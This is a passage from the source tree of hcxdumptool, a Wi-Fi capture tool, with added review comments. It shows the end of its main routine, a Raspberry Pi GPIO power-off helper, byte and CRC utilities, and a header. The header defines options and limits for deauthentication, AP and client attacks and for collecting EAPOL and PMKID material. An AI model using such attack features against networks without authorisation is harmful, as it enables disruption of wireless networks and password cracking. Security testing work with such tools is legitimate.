		strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1);
		ioctl(fd_socket, SIOCSIFFLAGS, &ifr);
		ioctl(fd_socket, SIOCSIWMODE, &iwr_old);
		ioctl(fd_socket, SIOCSIFFLAGS, &ifr_old);
		close(fd_socket);
		}
	if(fd_socket_gpsd > 0)
		{
		close(fd_socket_gpsd);
		}
	exit(EXIT_FAILURE);
	}

if(globalinit() == false)
	{
	fprintf(stderr, "failed to init globals\nhcxdumptool need full (monitor mode and full packet injection running all packet types) and exclusive access to the adapter\nthat is not the case\n");
	/* same restore sequence as above */
	if(fd_socket > 0)
		{
		memset(&ifr, 0, sizeof(ifr));
		strncpy(ifr.ifr_name, interfacename, IFNAMSIZ -1);
		ioctl(fd_socket, SIOCSIFFLAGS, &ifr);
		ioctl(fd_socket, SIOCSIWMODE, &iwr_old);
		ioctl(fd_socket, SIOCSIFFLAGS, &ifr_old);
		close(fd_socket);
		}
	if(fd_socket_gpsd > 0)
		{
		close(fd_socket_gpsd);
		}
	exit(EXIT_FAILURE);
	}

/* -C: list the channels. Execution falls into test_channels() unless
 * globalclose() terminates the process; the "no channel" branch below also
 * relies on it not returning, so it presumably exits - confirm */
if(showchannels == true)
	{
	show_channels();
	globalclose();
	}

test_channels();
if(channelscanlist[0] == 0)
	{
	fprintf(stderr, "no available channel found in scan list\n");
	globalclose();
	}

/* hand over to the capture loop, or to the rcascan loop when requested */
if(rcascanflag == false)
	{
	processpackets();
	}
else
	{
	processrcascan();
	}
return EXIT_SUCCESS;
}
/*===========================================================================*/
hcxdumptool-5.1.7/hcxpioff.c000066400000000000000000000205531350370021700160470ustar00rootroot00000000000000#define _GNU_SOURCE #include #include #include #include #include #include #include #include #include #include #include #include #include #include "include/version.h" #include "include/rpigpio.h"
/* long-option ids for getopt_long(); HCX_HELP/HCX_VERSION double as the short options */
#define HCX_GPIO_BUTTON 1
#define HCX_GPIO_STATUSLED 2
#define HCX_HELP 'h'
#define HCX_VERSION 'v'
/*===========================================================================*/
/* global var */
/* BCM GPIO numbers selected on the command line (2...27); 0 = pin not in use */
static int gpiostatusled;
static int gpiobutton;
/*===========================================================================*/
/*
 * Strip trailing '\n' characters and then trailing '\r' characters from
 * buffer in place and return the remaining length. Works backwards from
 * buffer[len-1]; both loops test len before dereferencing, so nothing is
 * read for len == 0 (buffer + len - 1 is still formed in that case).
 * Locals are static, as everywhere in this file, so the function is not
 * reentrant.
 */
static inline size_t chop(char *buffer, size_t len)
{
static char *ptr;

ptr = buffer +len -1;
while(len)
	{
	if (*ptr != '\n')
		break;
	*ptr-- = 0;
	len--;
	}
while(len)
	{
	if (*ptr != '\r')
		break;
	*ptr-- = 0;
	len--;
	}
return len;
}
/*---------------------------------------------------------------------------*/
/*
 * Read one line of at most size-1 bytes from inputstream into buffer.
 * Returns the line length without its line ending, or -1 at end of file or
 * when fgets() fails. A line longer than size-1 bytes arrives in pieces,
 * because fgets() stops after size-1 bytes.
 */
static inline int fgetline(FILE *inputstream, size_t size, char *buffer)
{
static size_t len;
static char *buffptr;

if(feof(inputstream))
	return -1;
buffptr = fgets (buffer, size, inputstream);
if(buffptr == NULL)
	return -1;
len = strlen(buffptr);
len = chop(buffptr, len);
return len;
}
/*===========================================================================*/
/*
 * Map the GPIO register block of the SoC into this process. gpioperi is the
 * peripheral base offset determined by getrpirev(); GPIO_BASE + gpioperi is
 * mapped read/write from /dev/mem (normally only possible as root). The
 * descriptor is closed right after mmap(), which the mapping survives; the
 * mapping itself is never unmapped (the process lives until poweroff or
 * exit()). gpio_map, gpio, BLOCK_SIZE and GPIO_BASE are not declared in this
 * file - presumably they come from include/rpigpio.h.
 * Returns false, after a message on stderr, if open() or mmap() fails.
 */
static bool initgpio(int gpioperi)
{
static int fd_mem;

fd_mem = open("/dev/mem", O_RDWR|O_SYNC);
if(fd_mem < 0)
	{
	fprintf(stderr, "failed to get device memory\n");
	return false;
	}
gpio_map = mmap(NULL, BLOCK_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd_mem, GPIO_BASE +gpioperi);
close(fd_mem);
if(gpio_map == MAP_FAILED)
	{
	fprintf(stderr, "failed to map GPIO memory\n");
	return false;
	}
gpio = (volatile unsigned *)gpio_map;
return true;
}
/*===========================================================================*/
/*
 * Determine the GPIO peripheral base offset of the Raspberry Pi this runs on
 * by parsing /proc/cpuinfo. Returns 0 when the file cannot be opened, when
 * any of the "Hardware", "Revision" and "Serial" lines is missing (rpi must
 * accumulate all three bits 1|2|4, i.e. reach 7) or when the revision code is
 * not one this function recognises; otherwise GPIO_PERI_BASE_OLD or
 * GPIO_PERI_BASE_NEW.
 *
 * The Revision line is tried in two layouts: first the last six hex digits
 * (rev is then bits 4..11 of that value - presumably the type field of the
 * new-style code) and, if that does not consume the whole tail, the last
 * four hex digits (old-style code). A parse only counts when strtol() stops
 * exactly at the end of the line (revptr - linein == len). rpirevision is a
 * global not declared in this file (presumably include/rpigpio.h).
 * Lines shorter than 15 characters are skipped - presumably so that the
 * len-6 / len-4 indexes stay inside linein.
 */
static int getrpirev()
{
static FILE *fh_rpi;
static int len;
static int rpi = 0;
static int rev = 0;
static int gpioperibase = 0;
static char *revptr = NULL;
static char *revstr = "Revision";
static char *hwstr = "Hardware";
static char *snstr = "Serial";
static char linein[128];

fh_rpi = fopen("/proc/cpuinfo", "r");
if(fh_rpi == NULL)
	{
	perror("failed to retrieve cpuinfo");
	return gpioperibase;
	}

while(1)
	{
	if((len = fgetline(fh_rpi, 128, linein)) == -1)
		{
		break;
		}
	if(len < 15)
		{
		continue;
		}
	/* memcmp() against the 8-byte "Hardware" / "Revision" and 6-byte "Serial" prefixes */
	if(memcmp(&linein, hwstr, 8) == 0)
		{
		rpi |= 1;
		continue;
		}
	if(memcmp(&linein, revstr, 8) == 0)
		{
		/* new-style revision code: last six hex digits of the line */
		rpirevision = strtol(&linein[len -6], &revptr, 16);
		if((revptr - linein) == len)
			{
			rev = (rpirevision >> 4) &0xff;
			if(rev <= 3)
				{
				gpioperibase = GPIO_PERI_BASE_OLD;
				rpi |= 2;
				continue;
				}
			if(rev == 0x9)
				{
				gpioperibase = GPIO_PERI_BASE_OLD;
				rpi |= 2;
				continue;
				}
			if(rev == 0xc)
				{
				gpioperibase = GPIO_PERI_BASE_OLD;
				rpi |= 2;
				continue;
				}
			if((rev == 0x04) || (rev == 0x08) || (rev == 0x0d) || (rev == 0x00e))
				{
				gpioperibase = GPIO_PERI_BASE_NEW;
				rpi |= 2;
				continue;
				}
			/* unknown type: rpi bit 2 stays clear, so the function returns 0 */
			continue;
			}
		/* old-style revision code: last four hex digits of the line */
		rpirevision = strtol(&linein[len -4], &revptr, 16);
		if((revptr - linein) == len)
			{
			if((rpirevision < 0x02) || (rpirevision > 0x15))
				{
				continue;
				}
			if((rpirevision == 0x11) || (rpirevision == 0x14))
				{
				continue;
				}
			gpioperibase = GPIO_PERI_BASE_OLD;
			rpi |= 2;
			}
		continue;
		}
	if(memcmp(&linein, snstr, 6) == 0)
		{
		rpi |= 4;
		continue;
		}
	}
fclose(fh_rpi);
if(rpi < 0x7)
	{
	return 0;
	}
return gpioperibase;
}
/*===========================================================================*/
/*
 * Validate the pin selection and set up the GPIO pins. Returns true without
 * doing anything when neither pin is in use. Rejects button == LED (the
 * message names "wpi_button"/"wpi_statusled", which does not match the
 * --gpio_button/--gpio_statusled options), locates and maps the GPIO block,
 * then configures the LED pin as output (INP_GPIO first, then OUT_GPIO) and
 * the button pin as input. INP_GPIO/OUT_GPIO are not declared in this file
 * (presumably include/rpigpio.h). Returns false on any failure, after a
 * message on stderr.
 */
static bool globalinit()
{
static int gpiobasemem = 0;

if((gpiobutton > 0) || (gpiostatusled > 0))
	{
	if(gpiobutton == gpiostatusled)
		{
		fprintf(stderr, "same value for wpi_button and wpi_statusled is not allowed\n");
		return false;
		}
	gpiobasemem = getrpirev();
	if(gpiobasemem == 0)
		{
		fprintf(stderr, "failed to locate GPIO\n");
		return false;
		}
	if(initgpio(gpiobasemem) == false)
		{
		fprintf(stderr, "failed to init GPIO\n");
		return false;
		}
	if(gpiostatusled > 0)
		{
		INP_GPIO(gpiostatusled);
		OUT_GPIO(gpiostatusled);
		}
	if(gpiobutton > 0)
		{
		INP_GPIO(gpiobutton);
		}
	}
return true;
}
/*===========================================================================*/
/*
 * Blink the status LED twice (set/clear with GPIO_DELAY between each step).
 * No-op when no LED pin is configured. GPIO_SET, GPIO_CLR and GPIO_DELAY are
 * not declared in this file (presumably include/rpigpio.h).
 */
static void ledflash()
{
if(gpiostatusled == 0)
	{
	return;
	}
GPIO_SET = 1 << gpiostatusled;
usleep(GPIO_DELAY);
GPIO_CLR = 1 << gpiostatusled;
usleep(GPIO_DELAY);
GPIO_SET = 1 << gpiostatusled;
usleep(GPIO_DELAY);
GPIO_CLR = 1 << gpiostatusled;
usleep(GPIO_DELAY);
return;
}
/*===========================================================================*/
/*
 * Poll the button once per second forever; never returns. When the button
 * reads high twice in a row (a double read, presumably meant as a crude
 * debounce) the LED is blinked (if configured) and "poweroff" is run through
 * system(). Only a non-zero status of that command is reported, followed by
 * exit(EXIT_FAILURE); on success the loop simply continues until the system
 * goes down. Every fifth iteration ledflash() serves as a heartbeat.
 *
 * NOTE(review): system("poweroff") resolves the command through the shell
 * using the PATH of this (root) process; an absolute path, or reboot(2)
 * called directly, would not depend on the environment.
 * NOTE(review): gpiobutton is not checked here. main() only requires that at
 * least one of the two pins is set, so with --gpio_statusled alone this
 * polls GET_GPIO(0) - presumably unintended; confirm.
 */
__attribute__ ((noreturn)) static void waitloop()
{
static int ret = 0;
static int count = 0;

while(1)
	{
	if(GET_GPIO(gpiobutton) > 0)
		{
		if(GET_GPIO(gpiobutton) > 0)
			{
			if(gpiostatusled > 0)
				{
				GPIO_CLR = 1 << gpiostatusled;
				usleep(GPIO_DELAY);
				GPIO_SET = 1 << gpiostatusled;
				usleep(GPIO_DELAY);
				GPIO_CLR = 1 << gpiostatusled;
				usleep(GPIO_DELAY);
				GPIO_SET = 1 << gpiostatusled;
				usleep(GPIO_DELAY);
				}
			ret = system("poweroff");
			if(ret != 0)
				{
				puts("poweroff failed!");
				exit(EXIT_FAILURE);
				}
			}
		}
	sleep(1);
	count++;
	if(count < 5)
		{
		continue;
		}
	ledflash();
	count = 0;
	}
}
/*===========================================================================*/
/*
 * Print the version banner and exit with EXIT_SUCCESS. eigenname is the
 * program name (main() passes basename(argv[0])).
 */
__attribute__ ((noreturn)) static inline void version(char *eigenname)
{
printf("%s %s (wpi version) (C) %s ZeroBeat\n", eigenname, VERSION, VERSION_JAHR);
exit(EXIT_SUCCESS);
}
/*---------------------------------------------------------------------------*/
/*
 * Print the help text and exit with EXIT_SUCCESS.
 * NOTE(review): several help lines look truncated ("usage : %s \n",
 * "--gpio_button= :"); placeholders such as <options>/<digit> may have been
 * dropped when this page was extracted rather than being missing in the
 * source - check against the repository before changing the strings.
 */
__attribute__ ((noreturn)) static inline void usage(char *eigenname)
{
printf("%s %s (wpi version) (C) %s ZeroBeat\n"
	"usage : %s \n"
	" press the button to power off\n"
	" hardware modification is necessary, read more:\n"
	" https://github.com/ZerBea/hcxdumptool/tree/master/docs\n"
	"\n"
	"options:\n"
	"-h : show this help\n"
	"-v : show version\n"
	"\n"
	"--gpio_button= : Raspberry Pi GPIO pin number of button (2...27)\n"
	" default = GPIO not in use\n"
	"--gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27)\n"
	" default = GPIO not in use\n"
	"--help : show this help\n"
	"--version : show version\n"
	"\n"
	"run gpio readall to print a table of all accessable pins and their numbers\n"
	"(wiringPi, BCM_GPIO and physical pin numbers)\n"
	"\n", eigenname, VERSION, VERSION_JAHR, eigenname);
exit(EXIT_SUCCESS);
}
/*---------------------------------------------------------------------------*/
/*
 * Print the "run -h for help" hint for a rejected command line and exit
 * with EXIT_FAILURE. Output goes to stdout, not stderr.
 */
__attribute__ ((noreturn)) static inline void usageerror(char *eigenname)
{
printf("%s %s (wpi version) (C) %s by ZeroBeat\n"
	"usage: %s -h for help\n", eigenname, VERSION, VERSION_JAHR, eigenname);
exit(EXIT_FAILURE);
}
/*===========================================================================*/
/*
 * Entry point of hcxpioff: parse --gpio_button/--gpio_statusled (BCM pin
 * numbers, 2...27 each), require at least one of them, initialise the GPIO
 * block via globalinit() and enter waitloop(). waitloop() is declared
 * noreturn, so the trailing return is never reached; -h/-v and bad options
 * terminate from inside the option loop.
 */
int main(int argc, char *argv[])
{
static int auswahl;
static int index;
static const char *short_options = "hv";
static const struct option long_options[] =
{
	{"gpio_button", required_argument, NULL, HCX_GPIO_BUTTON},
	{"gpio_statusled", required_argument, NULL, HCX_GPIO_STATUSLED},
	{"version", no_argument, NULL, HCX_VERSION},
	{"help", no_argument, NULL, HCX_HELP},
	{NULL, 0, NULL, 0}
};

auswahl = -1;
index = 0;
optind = 1;
optopt = 0;
gpiostatusled = 0;
gpiobutton = 0;
while((auswahl = getopt_long(argc, argv, short_options, long_options, &index)) != -1)
	{
	switch (auswahl)
		{
		case HCX_GPIO_BUTTON:
		/* strtoll() without an end pointer: a non-numeric argument parses as 0
		 * and is rejected by the range check */
		gpiobutton = strtoll(optarg, NULL, 10);
		if((gpiobutton < 2) || (gpiobutton > 27))
			{
			fprintf(stderr, "only 2...27 allowed\n");
			exit(EXIT_FAILURE);
			}
		break;

		case HCX_GPIO_STATUSLED:
		gpiostatusled = strtoll(optarg, NULL, 10);
		if((gpiostatusled < 2) || (gpiostatusled > 27))
			{
			fprintf(stderr, "only 2...27 allowed\n");
			exit(EXIT_FAILURE);
			}
		break;

		case HCX_HELP:
		usage(basename(argv[0]));
		break;

		case HCX_VERSION:
		version(basename(argv[0]));
		break;

		case '?':
		usageerror(basename(argv[0]));
		break;
		}
	}

/* either pin alone is accepted here; see the note on waitloop() about a
 * configuration with only the LED pin */
if((gpiobutton == 0) && (gpiostatusled == 0))
	{
	fprintf(stderr, "no GPIO pin selected\n");
	exit(EXIT_FAILURE);
	}

/* globalinit() has already reported the reason on stderr */
if(globalinit() == false)
	{
	exit(EXIT_FAILURE);
	}

waitloop();
return EXIT_SUCCESS;
}
/*===========================================================================*/
hcxdumptool-5.1.7/include/000077500000000000000000000000001350370021700155135ustar00rootroot00000000000000hcxdumptool-5.1.7/include/android-ifaddrs/000077500000000000000000000000001350370021700205455ustar00rootroot00000000000000hcxdumptool-5.1.7/include/android-ifaddrs/.lock000066400000000000000000000000001350370021700214640ustar00rootroot00000000000000hcxdumptool-5.1.7/include/byteops.c000066400000000000000000000037111350370021700173460ustar00rootroot00000000000000#define _GNU_SOURCE #include #include #include
/*===========================================================================*/
/* byteops.c: bit rotations and byte swaps.
 * NOTE(review): the three system header names after "#include" above are
 * absent in this copy of the file (page extraction), so the dependencies
 * cannot be listed here. */
/*
 * Rotate a left by n bits. n must be in 1...31: for n == 0 the right shift
 * would be by 32, which is undefined behaviour in C. Nothing checks n; the
 * same restriction (with 64 for the 64-bit variants) applies to the three
 * rotate functions that follow.
 */
uint32_t rotl32(uint32_t a, uint32_t n)
{
return((a << n) | (a >> (32 - n)));
}
/*===========================================================================*/
/* Rotate a left by n bits (n in 1...63, see rotl32). */
uint64_t rotl64(uint64_t a, uint64_t n)
{
return ((a << n) | (a >> (64 - n)));
}
/*===========================================================================*/
/* Rotate a right by n bits (n in 1...31, see rotl32). */
uint32_t rotr32(uint32_t a, uint32_t n)
{
return ((a >> n) | (a << (32 - n)));
}
/*===========================================================================*/
/* Rotate a right by n bits (n in 1...63, see rotl32). */
uint64_t rotr64(uint64_t a, uint64_t n)
{
return ((a >> n) | (a << (64 - n)));
}
/*===========================================================================*/
/*
 * Swap the two nibbles of n (despite the name, nothing byte-sized is
 * swapped). The result always fits in 8 bits; the uint16_t return type is
 * wider than necessary.
 */
uint16_t byte_swap_8(uint8_t n)
{
return (n & 0xf0) >> 4 | (n & 0x0f) << 4;
}
/*===========================================================================*/
/* Swap the two bytes of n. */
uint16_t byte_swap_16(uint16_t n)
{
return (n & 0xff00) >> 8 | (n & 0x00ff) << 8;
}
/*===========================================================================*/
/* Reverse the byte order of n; compiler builtin on clang/gcc, masks and shifts elsewhere. */
uint32_t byte_swap_32(uint32_t n)
{
#if defined (__clang__) || defined (__GNUC__)
return __builtin_bswap32 (n);
#else
return(n & 0xff000000) >> 24 | (n & 0x00ff0000) >> 8 | (n & 0x0000ff00) << 8 | (n & 0x000000ff) << 24;
#endif
}
/*===========================================================================*/
/* Reverse the byte order of n; compiler builtin on clang/gcc, masks and shifts elsewhere. */
uint64_t byte_swap_64(uint64_t n)
{
#if defined (__clang__) || defined (__GNUC__)
return __builtin_bswap64 (n);
#else
return (n & 0xff00000000000000ULL) >> 56 | (n & 0x00ff000000000000ULL) >> 40 | (n & 0x0000ff0000000000ULL) >> 24 | (n & 0x000000ff00000000ULL) >> 8 | (n & 0x00000000ff000000ULL) << 8 | (n & 0x0000000000ff0000ULL) << 24 | (n & 0x000000000000ff00ULL) << 40 | (n & 0x00000000000000ffULL) << 56;
#endif
}
/*===========================================================================*/
hcxdumptool-5.1.7/include/hashops.c000066400000000000000000000006161350370021700173270ustar00rootroot00000000000000#include "hashops.h"
/*===========================================================================*/
/*
 * Table-driven CRC-32 over bufferlen bytes of buffer: initial value
 * 0xFFFFFFFF, reflected table for polynomial 0xedb88320 (crc32table in
 * hashops.h), final complement - the conventional CRC-32 as used for the
 * IEEE 802.11 frame check sequence. Returns the CRC; the name suggests
 * callers compare it with the FCS carried at the end of a frame.
 * A CRC only detects accidental corruption; it is not a MAC and offers no
 * protection against deliberate modification of the frame.
 */
uint32_t fcscrc32check(const uint8_t *buffer, uint32_t bufferlen)
{
uint32_t crc = 0xFFFFFFFF;
uint32_t p;

for(p = 0; p < bufferlen; ++p)
	{
	crc = crc32table[(crc ^buffer[p]) & 0xff] ^(crc >> 8);
	}
return ~crc;
}
/*===========================================================================*/
hcxdumptool-5.1.7/include/hashops.h000066400000000000000000000063511350370021700173360ustar00rootroot00000000000000/*===========================================================================*/
/* CRC polynomial 0xedb88320 */
/* 256-entry lookup table for the reflected CRC-32; being static const in a
 * header, every translation unit that includes it gets its own 1 KiB copy. */
static const uint32_t crc32table[] =
{
0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3,
0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91,
0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7,
0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5,
0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b,
0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59,
0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f,
0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d,
0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433,
0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01,
0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457,
0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65,
0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb,
0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9,
0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f,
0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad,
0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683,
0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1,
0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7,
0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5,
0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b,
0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79,
0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f,
0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d,
0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713,
0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21,
0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777,
0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45,
0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db,
0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9,
0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf,
0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d
};
/*===========================================================================*/
hcxdumptool-5.1.7/include/hcxdumptool.h000066400000000000000000000077651350370021700202450ustar00rootroot00000000000000#define ERRORMAX 100
/* hcxdumptool.h: build-time defaults and limits used by hcxdumptool.c.
 * ERRORMAX, TIME_INTERVAL, EAPOLTIMEOUT, the *INTERVALL and *_MAX values are
 * the defaults that main() installs and the command line may override. */
#define GPSDDATA_MAX 1536
#define ESSID_LEN_MAX 32
#define RSN_LEN_MAX 24
#define TIME_INTERVAL 5
#define EAPOLTIMEOUT 150000
#define M1WAITTIME 1000
#define DEAUTHENTICATIONINTERVALL 10
#define DEAUTHENTICATIONS_MAX 100
#define APATTACKSINTERVALL 10
#define APPATTACKS_MAX 100
/* filter list: at most FILTERLIST_MAX entries of FILTERLIST_LINE_LEN bytes */
#define FILTERLIST_MAX 64
#define FILTERLIST_LINE_LEN 0xff
/* capacities of the per-device tables (entries) */
#define APLIST_MAX 0xfff
#define MYAPLIST_MAX 0xfff
#define POWNEDLIST_MAX 0xfff
#define PROBEREQUESTLIST_MAX 512
#define MYPROBERESPONSELIST_MAX 512
/* --station_vendor codes; CS_ENDE is the exclusive upper bound checked by main() */
#define CS_BROADCOM 1
#define CS_APPLE_BROADCOM 2
#define CS_SONOS 3
#define CS_NETGEARBROADCOM 4
#define CS_WILIBOX 5
#define CS_CISCO 6
#define CS_ENDE 7
/* bit flags: which EAPOL material has been seen */
#define RX_M1 0b00000001
#define RX_M12 0b00000010
#define RX_PMKID 0b00000100
#define RX_M23 0b00001000
/* bit flags for --enable_status (OR-ed into statusout by main()) */
#define STATUS_EAPOL 0b00000001
#define STATUS_PROBES 0b00000010
#define STATUS_AUTH 0b00000100
#define STATUS_ASSOC 0b00001000
#define STATUS_BEACON 0b00010000
/* long-option ids for getopt_long() in main(); HCXD_HELP/HCXD_VERSION double as short options */
#define HCXD_FILTERLIST 1
#define HCXD_FILTERMODE 2
#define HCXD_SILENT 3
#define HCXD_DISABLE_ACTIVE_SCAN 4
#define HCXD_DISABLE_DEAUTHENTICATIONS 5
#define HCXD_GIVE_UP_DEAUTHENTICATIONS 6
#define HCXD_DISABLE_DISASSOCIATIONS 7
#define HCXD_DISABLE_AP_ATTACKS 8
#define HCXD_GIVE_UP_AP_ATTACKS 9
#define HCXD_DISABLE_CLIENT_ATTACKS 10
#define HCXD_USE_GPSD 11
#define HCXD_AP_MAC 12
#define HCXD_STATION_MAC 13
#define HCXD_STATION_VENDOR 14
#define HCXD_DO_RCASCAN 15
#define HCXD_SAVE_RCASCAN 16
#define HCXD_SAVE_RCASCAN_RAW 17
#define HCXD_ENABLE_STATUS 18
#define HCXD_IGNORE_WARNING 19
#define HCXD_POWER_OFF 20
#define HCXD_GPIO_BUTTON 21
#define HCXD_GPIO_STATUSLED 22
#define HCXD_HELP 'h'
#define HCXD_VERSION 'v'

/* host byte order detection: __BYTE_ORDER__ is predefined by gcc/clang; other
 * compilers are only handled on OpenBSD.
 * NOTE(review): the header name after "# include" is absent in this copy of
 * the file (page extraction). */
#ifdef __BYTE_ORDER__
#if __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__
#define BIG_ENDIAN_HOST
#endif
#else
#ifdef __OpenBSD__
# include
# if BYTE_ORDER == BIG_ENDIAN
# define BIG_ENDIAN_HOST
# endif
#endif
#endif
/*===========================================================================*/
/* one observed access point */
struct aplist_s
{
uint64_t timestamp;	/* time of the last update */
uint8_t status;	/* status bits; presumably the RX_* flags above - confirm */
int count;
uint8_t addr[6];	/* BSSID */
uint8_t channel;
int essid_len;	/* valid bytes in essid */
uint8_t essid[ESSID_LEN_MAX];
int rsn_len;	/* valid bytes in rsn */
uint8_t rsn[RSN_LEN_MAX];
};
typedef struct aplist_s aplist_t;
#define APLIST_SIZE (sizeof(aplist_t))

/*
 * qsort() comparator on timestamp.
 * NOTE(review): it returns only 1 or 0, never a negative value, so cmp(a,b)
 * and cmp(b,a) are inconsistent; qsort() requires a proper three-way result
 * (see sort_macmaclist_by_time below for the intended form). The same
 * applies to sort_myaplist_by_time.
 */
static int sort_aplist_by_time(const void *a, const void *b)
{
const aplist_t *ia = (const aplist_t *)a;
const aplist_t *ib = (const aplist_t *)b;

return (ia->timestamp < ib->timestamp);
}

/*
 * qsort() comparator on the essid buffer. All ESSID_LEN_MAX (32) bytes take
 * part, not just essid_len, so bytes beyond the length influence the order
 * unless the writer zero-pads the buffer. memcmp() is evaluated twice for
 * unequal entries.
 */
static int sort_aplist_by_essid(const void *a, const void *b)
{
const aplist_t *ia = (const aplist_t *)a;
const aplist_t *ib = (const aplist_t *)b;

if(memcmp(ia->essid, ib->essid, 32) > 0)
	return 1;
else if(memcmp(ia->essid, ib->essid, 32) < 0)
	return -1;
return 0;
}
/*===========================================================================*/
/* one access point announced by this tool itself (no channel/rsn fields) */
struct myaplist_s
{
uint64_t timestamp;
uint8_t status;
uint8_t addr[6];
int essid_len;
uint8_t essid[ESSID_LEN_MAX];
};
typedef struct myaplist_s myaplist_t;
#define MYAPLIST_SIZE (sizeof(myaplist_t))

/* see the note on sort_aplist_by_time: 0/1 result, not a three-way comparator */
static int sort_myaplist_by_time(const void *a, const void *b)
{
const myaplist_t *ia = (const myaplist_t *)a;
const myaplist_t *ib = (const myaplist_t *)b;

return (ia->timestamp < ib->timestamp);
}
/*===========================================================================*/
/* single MAC address with timestamp and status */
struct maclist_s
{
uint64_t timestamp;
uint8_t status;
uint8_t addr[6];
};
typedef struct maclist_s maclist_t;
#define MACLIST_SIZE (sizeof(maclist_t))
/*===========================================================================*/
/* pair of MAC addresses with timestamp and status */
struct macmaclist_s
{
uint64_t timestamp;
uint8_t status;
uint8_t addr1[6];
uint8_t addr2[6];
};
typedef struct macmaclist_s macmaclist_t;
#define MACMACLIST_SIZE (sizeof(macmaclist_t))

/* three-way qsort() comparator; returns 1 when a is OLDER than b, so the
 * resulting order is newest first (descending timestamp) */
static int sort_macmaclist_by_time(const void *a, const void *b)
{
const macmaclist_t *ia = (const macmaclist_t *)a;
const macmaclist_t *ib = (const macmaclist_t *)b;

if(ia->timestamp < ib->timestamp)
	return 1;
else if(ia->timestamp > ib->timestamp)
	return -1;
return 0;
}
/*===========================================================================*/
hcxdumptool-5.1.7/include/ieee80211.c000066400000000000000000000007701350370021700171660ustar00rootroot00000000000000#include "ieee80211.h"
/*===========================================================================*/
/*
 * Classify an EAPOL-Key frame by its key-information field ki (host order).
 * Returns the 4-way-handshake message number 1...4 derived from the
 * WPA_KEY_INFO_ACK, WPA_KEY_INFO_INSTALL and WPA_KEY_INFO_SECURE bits:
 *   ACK set, INSTALL set      -> 3   (AP -> STA)
